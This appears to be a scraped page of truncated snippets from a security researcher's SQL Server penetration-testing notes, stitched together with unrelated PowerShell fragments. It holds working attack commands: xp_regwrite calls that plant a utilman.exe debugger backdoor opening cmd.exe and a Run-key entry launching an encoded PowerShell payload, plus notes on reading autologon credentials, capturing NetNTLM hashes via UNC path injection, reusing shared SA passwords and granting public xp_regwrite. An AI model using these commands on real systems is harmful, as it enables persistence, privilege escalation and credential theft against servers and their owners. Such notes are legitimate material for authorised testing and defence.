nullbind

Below is an overview of how to test for shared SA accounts in SQL Server without knowing the password.

Requirements
- sysadmin privileges on SQL Server

Process
- dump spn or provide sql server list
- enable ad-hoc queries, or create a link to sql servers on target list
- submit query to each sql server, if the sa password is the same as the local instance then the query will work.

nullbind

Below are some notes for grabbing a list of domain users and other information via ADFS using acquired credentials.

Install Apps

Download and install visual studio 10

Downoad and install the Lync SDK
https://www.microsoft.com/en-us/download/details.aspx?id=36824 (deprecated)
http://go.microsoft.com/fwlink/?LinkID=248583

nullbind

Below is a basic SQL Server registry hack that allows non sysadmin logins to use xp_regwrite to access senstive registry locations.

Scenario
--------
Give Public role members privileges to execute xp_regwrite.

GRANT EXEC ON OBJECT::master.dbo.xp_regwrite TO [Public]

Issue
-----

nullbind

-- This will create a registry key through SQL Server (as sysadmin)
-- to run a defined debugger (any command) instead of intended command
-- in the example utilman.exe can be replace with cmd.exe and executed on demand via rdp
--- note: this could easily be a empire/other payload
EXEC master..xp_regwrite
@rootkey     = 'HKEY_LOCAL_MACHINE',
@key         = 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe',
@value_name  = 'Debugger',
@type        = 'REG_SZ',
@value       = '"c:\windows\system32\cmd.exe"'

nullbind

---------------------------------------------
-- Use SQL Server xp_regwrite to configure 
-- a file to execute ps encoded command when users login
----------------------------------------------
EXEC master..xp_regwrite
@rootkey     = 'HKEY_LOCAL_MACHINE',
@key         = 'Software\Microsoft\Windows\CurrentVersion\Run',
@value_name  = 'EvilSauce',
@type        = 'REG_SZ',
@value       = '"PowerShell -ENC <encodedcommand>"'

nullbind

-- Get the Windows auto login credentials through SQL Server using xp_regread
-- Requires sysadmin privileges
-- Reference: https://support.microsoft.com/en-us/kb/887165

-------------------------------------------------------------------------
-- Get Windows Auto Login Credentials from the Registry
-------------------------------------------------------------------------

-- Get AutoLogin Default Domain
DECLARE @AutoLoginDomain  SYSNAME

nullbind

0..100 | ForEach-Object{
    $x = 37 + (GET-RANDOM 4000)
    $y = 37 + $_
    [console]::beep($x,$y)
}

nullbind

This is a list of SQL Server commands that support UNC path [injections] by default.
The injections can be used to capture or replay the NetNTLM password hash of the
Windows account used to run the SQL Server service. The SQL Server service account 
has sysadmin privileges by default in all versions of SQL Server.

Note: This list is most likely not complete.

-----------------------------------------------------------------------
-- UNC Path Injections Executable by the Public Fixed Server Role 
-----------------------------------------------------------------------

nullbind

# Modified version of https://github.com/RamblingCookieMonster/Invoke-Parallel
# added option to import all current sessions functions into the runspace session state

function Invoke-Parallel {
    <#
    .SYNOPSIS
        Function to control parallel processing using runspaces

    .DESCRIPTION
        Function to control parallel processing using runspaces

nullbind

# Modified Example From : https://blogs.technet.microsoft.com/heyscriptingguy/2015/11/28/beginning-use-of-powershell-runspaces-part-3/
# Added import of all current session functions into the sessionstate for the runspacepool 


# --------------------------------------------------
#region - Setup custom functions
# --------------------------------------------------

# Create custom function to import into runspace session state
Function ConvertTo-Hex {